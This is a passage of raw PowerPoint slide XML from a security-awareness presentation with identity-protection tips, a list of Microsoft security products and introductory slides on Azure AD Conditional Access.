                  <a:pt x="3947890" y="810952"/>
                  <a:pt x="3611441" y="734506"/>
                  <a:pt x="3481051" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3350661" y="865932"/>
                  <a:pt x="3119019" y="799530"/>
                  <a:pt x="2759649" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2400279" y="800908"/>
                  <a:pt x="2565706" y="776901"/>
                  <a:pt x="2410399" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2255092" y="823537"/>
                  <a:pt x="1971883" y="761334"/>
                  <a:pt x="1688997" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1406111" y="839104"/>
                  <a:pt x="1265140" y="731323"/>
                  <a:pt x="967595" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="670050" y="869115"/>
                  <a:pt x="401829" y="759186"/>
                  <a:pt x="0" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-41666" y="700217"/>
                  <a:pt x="36869" y="488230"/>
                  <a:pt x="0" y="384105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-36869" y="279980"/>
                  <a:pt x="4545" y="98694"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="7443036" h="800219" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="118211" y="-42176"/>
                  <a:pt x="295514" y="4709"/>
                  <a:pt x="423681" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="551848" y="-4709"/>
                  <a:pt x="610736" y="7212"/>
                  <a:pt x="772931" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="935126" y="-7212"/>
                  <a:pt x="1192713" y="54752"/>
                  <a:pt x="1345472" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1498231" y="-54752"/>
                  <a:pt x="1902953" y="50785"/>
                  <a:pt x="2066874" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2230795" y="-50785"/>
                  <a:pt x="2405344" y="32479"/>
                  <a:pt x="2639415" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2873486" y="-32479"/>
                  <a:pt x="3186403" y="15991"/>
                  <a:pt x="3360817" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3535231" y="-15991"/>
                  <a:pt x="3597048" y="8933"/>
                  <a:pt x="3784498" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3971948" y="-8933"/>
                  <a:pt x="4159443" y="18003"/>
                  <a:pt x="4282608" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4405773" y="-18003"/>
                  <a:pt x="4653316" y="42961"/>
                  <a:pt x="4929580" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5205844" y="-42961"/>
                  <a:pt x="5385913" y="53832"/>
                  <a:pt x="5650982" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5916051" y="-53832"/>
                  <a:pt x="5996265" y="60657"/>
                  <a:pt x="6223523" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6450781" y="-60657"/>
                  <a:pt x="6503329" y="14099"/>
                  <a:pt x="6647204" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6791079" y="-14099"/>
                  <a:pt x="7175572" y="48461"/>
                  <a:pt x="7443036" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7460564" y="199454"/>
                  <a:pt x="7442474" y="265508"/>
                  <a:pt x="7443036" y="408112"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7443598" y="550716"/>
                  <a:pt x="7411351" y="646732"/>
                  <a:pt x="7443036" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7140786" y="823311"/>
                  <a:pt x="7109358" y="748675"/>
                  <a:pt x="6796064" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6482770" y="851763"/>
                  <a:pt x="6562902" y="799607"/>
                  <a:pt x="6446814" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6330726" y="800831"/>
                  <a:pt x="5998397" y="775610"/>
                  <a:pt x="5874273" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5750149" y="824828"/>
                  <a:pt x="5511805" y="764691"/>
                  <a:pt x="5227301" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4942797" y="835747"/>
                  <a:pt x="4892789" y="773349"/>
                  <a:pt x="4654760" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4416731" y="827089"/>
                  <a:pt x="4233094" y="798913"/>
                  <a:pt x="4082219" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3931344" y="801525"/>
                  <a:pt x="3745513" y="778677"/>
                  <a:pt x="3435247" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3124981" y="821761"/>
                  <a:pt x="3157158" y="782121"/>
                  <a:pt x="3085997" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3014836" y="818317"/>
                  <a:pt x="2793240" y="750308"/>
                  <a:pt x="2662317" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2531394" y="850130"/>
                  <a:pt x="2241523" y="778022"/>
                  <a:pt x="2015345" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1789167" y="822416"/>
                  <a:pt x="1761881" y="770548"/>
                  <a:pt x="1666095" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1570309" y="829890"/>
                  <a:pt x="1406121" y="754738"/>
                  <a:pt x="1167984" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="929847" y="845700"/>
                  <a:pt x="949267" y="770712"/>
                  <a:pt x="818734" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="688201" y="829726"/>
                  <a:pt x="394006" y="778641"/>
                  <a:pt x="0" y="800219"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-6001" y="686364"/>
                  <a:pt x="6009" y="589450"/>
                  <a:pt x="0" y="400110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-6009" y="210770"/>
                  <a:pt x="26757" y="191560"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="143895878">
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <ask:type>
                    <ask:lineSketchScribble/>
                  </ask:type>
                </ask:lineSketchStyleProps>
              </a:ext>
            </a:extLst>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="31750"/>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="BreveText"/>
              </a:rPr>
              <a:t>"The physical presence of data is so small that sometimes we don’t think about it as being clutter, but we accumulate massive amounts of it, and some of it can be harmful if it gets lost or stolen.“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="BreveText"/>
              </a:rPr>
              <a:t>Michael Kaiser, executive director of the National Cyber Security Alliance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="BreveText"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1942660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0F73A0CA-E59E-46D7-B5A4-46EDBA12867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711017" y="1533498"/>
            <a:ext cx="7320525" cy="411779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6D0C3FF4-734C-42E0-A3D5-B8BDB9967465}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657224" y="499533"/>
            <a:ext cx="10772775" cy="54228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cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>Protecting your Identity tips and tricks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{759525CA-CAEE-48DE-ADA7-59239705DB8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1379095"/>
            <a:ext cx="4663440" cy="4386367"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Multi Factor Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Separate your personal accounts from your work &amp; school accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By all means </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>do not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> use the same passwords for your accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Utilize Password Managers to help you “remember” all these passwords, online for personal sites and service and even business if allowed, and offline Password manager for more sensitive work-related services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Passwordless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> authentication where it’s possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid using your Social Media Identities for Single Sign-on to important sites and services.</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F17C9C17-FC1A-406E-8E31-D8AE0A80C8FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8956623" y="5534630"/>
            <a:ext cx="1806315" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cartoon by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Phil Johnson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for MIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1325504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D0C3FF4-734C-42E0-A3D5-B8BDB9967465}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657224" y="499533"/>
            <a:ext cx="10772775" cy="54228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cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>Microsoft Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{759525CA-CAEE-48DE-ADA7-59239705DB8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1379095"/>
            <a:ext cx="4663440" cy="4386367"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Azure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> Active Directory (AAD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Conditional Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Privileged Identity Management (PIM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Role Based Access Control (RBAC)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identity Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Defender For Identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Defender for Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Sentinel (SIEM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4638DAD8-8CAC-4BAC-958E-0FBA7DA6051F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5340096" y="770674"/>
            <a:ext cx="6806612" cy="2468881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EC9DB8C-9B65-4B23-891B-3701C24797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4267" y="3698003"/>
            <a:ext cx="3675482" cy="206745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icrosoft Sentinel core capabilities">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A08F7D-629F-4AA0-908B-BB9BAB7C0F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0096" y="3326708"/>
            <a:ext cx="2932718" cy="3031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682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92-1D75-4F95-93D9-A11C26A9876E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Conditional Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0659C07-3C2D-4999-A3D4-4FB314B0B0C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="667512" y="4204209"/>
            <a:ext cx="9511028" cy="1645920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basics and four rules you should absolutely have.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1925061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E90D-86CA-1EC8-E7E6-1B8DE59538A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7836310" y="499533"/>
            <a:ext cx="3706761" cy="1658198"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3700" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>What is Conditional Access ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34909928-7F82-4D2B-B7B5-F7367F8FF9A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p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="633999" y="1490069"/>
            <a:ext cx="6912217" cy="388812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0231E6F-2171-6C38-B602-A1C247332692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7836310" y="2011680"/>
            <a:ext cx="3706761" cy="3864732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="nb-NO" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Key part of zero trust strategy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Conditional Access policies are at simplest if-then statements that determine if a user wants to access a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>resouce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, then they must complete an action.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Brings signals in real time together, to make decisions and enforce organizational policies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Applies the right access control when needed to protect your organization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2234345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EBAE0B-DD72-4094-8934-3B46A9142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7EB3B8-0691-4800-98F2-03E19E12850E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704850" y="770467"/>
            <a:ext cx="10782300" cy="3294159"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6600"/>
              <a:t> Who, why and how?​</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2380398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E90D-86CA-1EC8-E7E6-1B8DE59538A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7836310" y="499533"/>
            <a:ext cx="3706761" cy="1658198"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3700" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Why use Conditional Access?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3700" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3700" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="A diagram showing how conditional access works in Azure A D.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A86DCE3C-D295-444C-A36F-10AF804250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3999" y="1991205"/>
            <a:ext cx="6912217" cy="28858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0231E6F-2171-6C38-B602-A1C247332692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7836310" y="2011680"/>
            <a:ext cx="3706761" cy="3864732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>To empower users to be productive wherever and whenever</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Protect valuable organization assets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Enforce Actions to be taken if a risky user activity is detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>«Report Only Mode» Allows you to see the impact before applying the policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Targeted towards Users, Groups and now in public preview single tenant Workload Identities (Service Principals).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nb-NO" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42904001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E90D-86CA-1EC8-E7E6-1B8DE59538A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648773" y="499533"/>
            <a:ext cx="4894299" cy="1658198"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
